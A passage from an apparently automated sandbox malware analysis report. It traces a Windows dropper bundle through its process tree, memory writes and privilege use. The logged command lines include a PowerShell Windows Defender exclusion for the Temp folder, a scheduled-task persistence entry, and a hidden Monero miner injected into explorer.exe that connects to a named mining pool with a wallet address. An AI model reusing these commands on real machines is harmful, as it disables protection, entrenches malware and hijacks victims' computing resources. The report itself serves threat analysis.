SeCreatePagefilePrivilege 2296 Process not Found Token: SeDebugPrivilege 4208 LivelyScreenRecF18.exe Token: SeShutdownPrivilege 2296 Process not Found Token: SeCreatePagefilePrivilege 2296 Process not Found Token: SeShutdownPrivilege 2296 Process not Found -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 6452 ultramediaburner.tmp 2840 installer.exe 2296 Process not Found 2296 Process not Found -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 2296 Process not Found 6636 MicrosoftEdge.exe 7712 MicrosoftEdgeCP.exe 7712 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4464 wrote to memory of 4448 4464 setup_x86_x64_install.exe 71 PID 4464 wrote to memory of 4448 4464 setup_x86_x64_install.exe 71 PID 4464 wrote to memory of 4448 4464 setup_x86_x64_install.exe 71 PID 4448 wrote to memory of 4056 4448 setup_installer.exe 72 PID 4448 wrote to memory of 4056 4448 setup_installer.exe 72 PID 4448 wrote to memory of 4056 4448 setup_installer.exe 72 PID 4056 wrote to memory of 4692 4056 setup_install.exe 75 PID 4056 wrote to memory of 4692 4056 setup_install.exe 75 PID 4056 wrote to memory of 4692 4056 setup_install.exe 75 PID 4056 wrote to memory of 4792 4056 setup_install.exe 76 PID 4056 wrote to memory of 4792 4056 setup_install.exe 76 PID 4056 wrote to memory of 4792 4056 setup_install.exe 76 PID 4056 wrote to memory of 4844 4056 setup_install.exe 79 PID 4056 wrote to memory of 4844 4056 setup_install.exe 79 PID 4056 wrote to memory of 4844 4056 setup_install.exe 79 PID 4056 wrote to memory of 4840 4056 setup_install.exe 77 PID 4056 wrote to memory of 4840 4056 setup_install.exe 77 PID 4056 wrote to memory of 4840 4056 setup_install.exe 77 PID 4056 wrote to memory of 4896 4056 setup_install.exe 78 PID 4056 wrote to memory of 4896 4056 setup_install.exe 78 PID 4056 wrote to memory of 4896 4056 setup_install.exe 78 PID 4056 wrote to memory of 4784 4056 setup_install.exe 80 PID 4056 wrote to memory of 4784 4056 setup_install.exe 80 PID 4056 wrote to memory of 4784 4056 setup_install.exe 80 PID 4056 wrote to memory of 4796 4056 setup_install.exe 81 PID 4056 wrote to memory of 4796 4056 setup_install.exe 81 PID 4056 wrote to memory of 4796 4056 setup_install.exe 81 PID 4056 wrote to memory of 3172 4056 setup_install.exe 82 PID 4056 wrote to memory of 3172 4056 setup_install.exe 82 PID 4056 wrote to memory of 3172 4056 setup_install.exe 82 PID 4056 wrote to memory of 2940 4056 setup_install.exe 83 PID 4056 wrote to memory of 2940 4056 setup_install.exe 83 PID 4056 wrote to memory of 2940 4056 setup_install.exe 83 PID 4056 wrote to memory of 424 4056 setup_install.exe 84 PID 4056 wrote to memory of 424 4056 setup_install.exe 84 PID 4056 wrote to memory of 424 4056 setup_install.exe 84 PID 4056 wrote to memory of 524 4056 setup_install.exe 85 PID 4056 wrote to memory of 524 4056 setup_install.exe 85 PID 4056 wrote to memory of 524 4056 setup_install.exe 85 PID 4056 wrote to memory of 664 4056 setup_install.exe 86 PID 4056 wrote to memory of 664 4056 setup_install.exe 86 PID 4056 wrote to memory of 664 4056 setup_install.exe 86 PID 4056 wrote to memory of 820 4056 setup_install.exe 87 PID 4056 wrote to memory of 820 4056 setup_install.exe 87 PID 4056 wrote to memory of 820 4056 setup_install.exe 87 PID 3172 wrote to memory of 404 3172 cmd.exe 88 PID 3172 wrote to memory of 404 3172 cmd.exe 88 PID 664 wrote to memory of 504 664 cmd.exe 89 PID 664 wrote to memory of 504 664 cmd.exe 89 PID 664 wrote to memory of 504 664 cmd.exe 89 PID 4796 wrote to memory of 1068 4796 cmd.exe 90 PID 4796 wrote to memory of 1068 4796 cmd.exe 90 PID 4796 wrote to memory of 1068 4796 cmd.exe 90 PID 4896 wrote to memory of 1184 4896 cmd.exe 91 PID 4896 wrote to memory of 1184 4896 cmd.exe 91 PID 524 wrote to memory of 1332 524 cmd.exe 94 PID 524 wrote to memory of 1332 524 cmd.exe 94 PID 524 wrote to memory of 1332 524 cmd.exe 94 PID 2940 wrote to memory of 1388 2940 cmd.exe 92 PID 2940 wrote to memory of 1388 2940 cmd.exe 92 PID 2940 wrote to memory of 1388 2940 cmd.exe 92 PID 4784 wrote to memory of 1516 4784 cmd.exe 121 PID 4784 wrote to memory of 1516 4784 cmd.exe 121 PID 4784 wrote to memory of 1516 4784 cmd.exe 121
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵PID:1084
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
- Modifies registry class
PID:2376
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
- Modifies registry class
PID:5064 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Modifies registry class
PID:5460
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵PID:2680
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵PID:2660
-
C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R2⤵PID:6560
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵PID:2528
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵PID:2360
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵PID:1956
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵PID:1420
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵PID:1356
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵PID:1156
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
PID:892
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵PID:320
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4464 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4448 -
C:\Users\Admin\AppData\Local\Temp\7zS061B71B2\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS061B71B2\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4056 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵PID:4692
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4644
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1917b8fb5f09db8.exe4⤵PID:4792
-
C:\Users\Admin\AppData\Local\Temp\7zS061B71B2\Sun1917b8fb5f09db8.exeSun1917b8fb5f09db8.exe5⤵
- Executes dropped EXE
- Checks computer location settings
PID:1800
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun193fda712d9f1.exe4⤵PID:4840
-
C:\Users\Admin\AppData\Local\Temp\7zS061B71B2\Sun193fda712d9f1.exeSun193fda712d9f1.exe5⤵
- Executes dropped EXE
PID:1968
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19e4ade31b2a.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4896 -
C:\Users\Admin\AppData\Local\Temp\7zS061B71B2\Sun19e4ade31b2a.exeSun19e4ade31b2a.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1184 -
C:\Users\Admin\AppData\Roaming\4111071.scr"C:\Users\Admin\AppData\Roaming\4111071.scr" /S6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5100
-
-
C:\Users\Admin\AppData\Roaming\5262791.scr"C:\Users\Admin\AppData\Roaming\5262791.scr" /S6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4640 -
C:\Users\Admin\AppData\Roaming\5262791.scr"C:\Users\Admin\AppData\Roaming\5262791.scr"7⤵
- Executes dropped EXE
PID:4704
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 8967⤵
- Program crash
PID:5208
-
-
-
C:\Users\Admin\AppData\Roaming\7574743.scr"C:\Users\Admin\AppData\Roaming\7574743.scr" /S6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4900
-
-
C:\Users\Admin\AppData\Roaming\2340772.scr"C:\Users\Admin\AppData\Roaming\2340772.scr" /S6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4808
-
-
C:\Users\Admin\AppData\Roaming\3596903.scr"C:\Users\Admin\AppData\Roaming\3596903.scr" /S6⤵PID:624
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19262b9e49ad.exe4⤵PID:4844
-
C:\Users\Admin\AppData\Local\Temp\7zS061B71B2\Sun19262b9e49ad.exeSun19262b9e49ad.exe5⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:964 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:6096
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:6940
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1908b94df837b3158.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4784 -
C:\Users\Admin\AppData\Local\Temp\7zS061B71B2\Sun1908b94df837b3158.exeSun1908b94df837b3158.exe5⤵PID:1516
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19de8ff4b6aefeb8.exe /mixone4⤵
- Suspicious use of WriteProcessMemory
PID:4796 -
C:\Users\Admin\AppData\Local\Temp\7zS061B71B2\Sun19de8ff4b6aefeb8.exeSun19de8ff4b6aefeb8.exe /mixone5⤵
- Executes dropped EXE
PID:1068 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1068 -s 6566⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4916
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1068 -s 6806⤵
- Program crash
PID:5480
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1068 -s 6446⤵
- Program crash
PID:5828
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1068 -s 6646⤵
- Program crash
PID:4732
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1068 -s 8846⤵
- Program crash
PID:6196
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1068 -s 9286⤵
- Program crash
PID:6812
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1068 -s 11766⤵
- Program crash
PID:4024
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1068 -s 12166⤵
- Program crash
PID:5900
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1068 -s 12806⤵
- Program crash
PID:5724
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1068 -s 12686⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:6720
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun191101c1aaa.exe4⤵
- Suspicious use of WriteProcessMemory
PID:3172 -
C:\Users\Admin\AppData\Local\Temp\7zS061B71B2\Sun191101c1aaa.exeSun191101c1aaa.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:404 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
PID:5056 -
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵PID:4076
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵PID:3520
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
PID:6568
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6164 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵PID:7320
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
PID:7564
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵
- Executes dropped EXE
PID:7400
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵PID:7016
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4484 -
C:\ProgramData\7803407.exe"C:\ProgramData\7803407.exe"8⤵
- Executes dropped EXE
PID:5336
-
-
C:\ProgramData\6514043.exe"C:\ProgramData\6514043.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5936 -
C:\ProgramData\6514043.exe"C:\ProgramData\6514043.exe"9⤵
- Executes dropped EXE
PID:5480
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5936 -s 9489⤵
- Program crash
PID:908
-
-
-
C:\ProgramData\6203035.exe"C:\ProgramData\6203035.exe"8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5812
-
-
C:\ProgramData\5436869.exe"C:\ProgramData\5436869.exe"8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4608
-
-
C:\ProgramData\5844605.exe"C:\ProgramData\5844605.exe"8⤵
- Executes dropped EXE
PID:5264
-
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4768
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:4872 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4872 -s 8048⤵
- Program crash
PID:5488
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4872 -s 8448⤵
- Program crash
PID:6012
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4872 -s 8688⤵
- Program crash
PID:5804
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4872 -s 9608⤵
- Program crash
PID:1444
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4872 -s 9968⤵
- Program crash
PID:5348
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4872 -s 10848⤵
- Program crash
PID:5900
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4872 -s 11568⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:6920
-
-
-
C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe"C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe"7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
PID:4208
-
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4392 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2120
-
-
-
C:\Users\Admin\AppData\Local\Temp\udptest.exe"C:\Users\Admin\AppData\Local\Temp\udptest.exe"7⤵
- Executes dropped EXE
PID:2896
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1516 -
C:\Users\Admin\AppData\Local\Temp\is-D8KGN.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-D8KGN.tmp\setup_2.tmp" /SL5="$10304,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2776 -
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT9⤵
- Executes dropped EXE
PID:5308
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"7⤵
- Executes dropped EXE
PID:3500 -
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a8⤵
- Executes dropped EXE
PID:5696
-
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵
- Executes dropped EXE
PID:3928
-
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"7⤵
- Executes dropped EXE
PID:5144
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19eb40faaaa9.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2940 -
C:\Users\Admin\AppData\Local\Temp\7zS061B71B2\Sun19eb40faaaa9.exeSun19eb40faaaa9.exe5⤵
- Executes dropped EXE
PID:1388
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun198361825f4.exe4⤵PID:424
-
C:\Users\Admin\AppData\Local\Temp\7zS061B71B2\Sun198361825f4.exeSun198361825f4.exe5⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
PID:1836
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1905815e51282417.exe4⤵
- Suspicious use of WriteProcessMemory
PID:524 -
C:\Users\Admin\AppData\Local\Temp\7zS061B71B2\Sun1905815e51282417.exeSun1905815e51282417.exe5⤵
- Executes dropped EXE
PID:1332
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun195a1614ec24e6a.exe4⤵
- Suspicious use of WriteProcessMemory
PID:664 -
C:\Users\Admin\AppData\Local\Temp\7zS061B71B2\Sun195a1614ec24e6a.exeSun195a1614ec24e6a.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:504
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1966fb31dd5a07.exe4⤵PID:820
-
C:\Users\Admin\AppData\Local\Temp\7zS061B71B2\Sun1966fb31dd5a07.exeSun1966fb31dd5a07.exe5⤵
- Executes dropped EXE
PID:2920 -
C:\Users\Admin\AppData\Local\Temp\is-G50VH.tmp\Sun1966fb31dd5a07.tmp"C:\Users\Admin\AppData\Local\Temp\is-G50VH.tmp\Sun1966fb31dd5a07.tmp" /SL5="$6005C,247014,163328,C:\Users\Admin\AppData\Local\Temp\7zS061B71B2\Sun1966fb31dd5a07.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
PID:3148 -
C:\Users\Admin\AppData\Local\Temp\is-DREF4.tmp\Ze2ro.exe"C:\Users\Admin\AppData\Local\Temp\is-DREF4.tmp\Ze2ro.exe" /S /UID=burnerch27⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
PID:2764 -
C:\Program Files\Microsoft Office 15\VRDUYBAETY\ultramediaburner.exe"C:\Program Files\Microsoft Office 15\VRDUYBAETY\ultramediaburner.exe" /VERYSILENT8⤵
- Executes dropped EXE
PID:6356 -
C:\Users\Admin\AppData\Local\Temp\is-541D2.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-541D2.tmp\ultramediaburner.tmp" /SL5="$603BA,281924,62464,C:\Program Files\Microsoft Office 15\VRDUYBAETY\ultramediaburner.exe" /VERYSILENT9⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:6452 -
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:6712
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\61-afce5-63a-7b393-080ceaf84e41a\Hahypiqidi.exe"C:\Users\Admin\AppData\Local\Temp\61-afce5-63a-7b393-080ceaf84e41a\Hahypiqidi.exe"8⤵
- Executes dropped EXE
- Checks computer location settings
PID:6408
-
-
C:\Users\Admin\AppData\Local\Temp\6e-c2c24-280-8a685-009fc581ecbdc\Dapicelebae.exe"C:\Users\Admin\AppData\Local\Temp\6e-c2c24-280-8a685-009fc581ecbdc\Dapicelebae.exe"8⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:6468 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\apjv1pc4.qjz\GcleanerEU.exe /eufive & exit9⤵PID:3520
-
C:\Users\Admin\AppData\Local\Temp\apjv1pc4.qjz\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\apjv1pc4.qjz\GcleanerEU.exe /eufive10⤵
- Executes dropped EXE
PID:5988
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\a3uuff3b.5be\installer.exe /qn CAMPAIGN="654" & exit9⤵PID:6776
-
C:\Users\Admin\AppData\Local\Temp\a3uuff3b.5be\installer.exeC:\Users\Admin\AppData\Local\Temp\a3uuff3b.5be\installer.exe /qn CAMPAIGN="654"10⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:2840 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\a3uuff3b.5be\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\a3uuff3b.5be\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1632174500 /qn CAMPAIGN=""654"" " CAMPAIGN="654"11⤵PID:3588
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\chb1iugy.nnu\anyname.exe & exit9⤵PID:5016
-
C:\Users\Admin\AppData\Local\Temp\chb1iugy.nnu\anyname.exeC:\Users\Admin\AppData\Local\Temp\chb1iugy.nnu\anyname.exe10⤵
- Executes dropped EXE
PID:6816
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bflb4kuu.kvm\gcleaner.exe /mixfive & exit9⤵PID:5948
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
- Executes dropped EXE
PID:4076
-
-
C:\Users\Admin\AppData\Local\Temp\bflb4kuu.kvm\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\bflb4kuu.kvm\gcleaner.exe /mixfive10⤵
- Executes dropped EXE
PID:5772
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-MOQ41.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-MOQ41.tmp\setup_2.tmp" /SL5="$3036A,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
PID:5536
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:5948 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
- Modifies registry class
PID:5992
-
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"1⤵
- Executes dropped EXE
PID:5428
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:2176 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
- Modifies registry class
PID:2956
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
PID:4724 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 25A01F8243E539914B448E5AD159E631 C2⤵
- Loads dropped DLL
PID:5304
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 5564E9B26ED9D1F63DBDFD3C10F2CAAC2⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:5732 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
PID:8092 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Executes dropped EXE
PID:624
-
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding A70E53D832ED2402ECBE4C2523875BD0 E Global\MSI00002⤵
- Loads dropped DLL
PID:5752
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
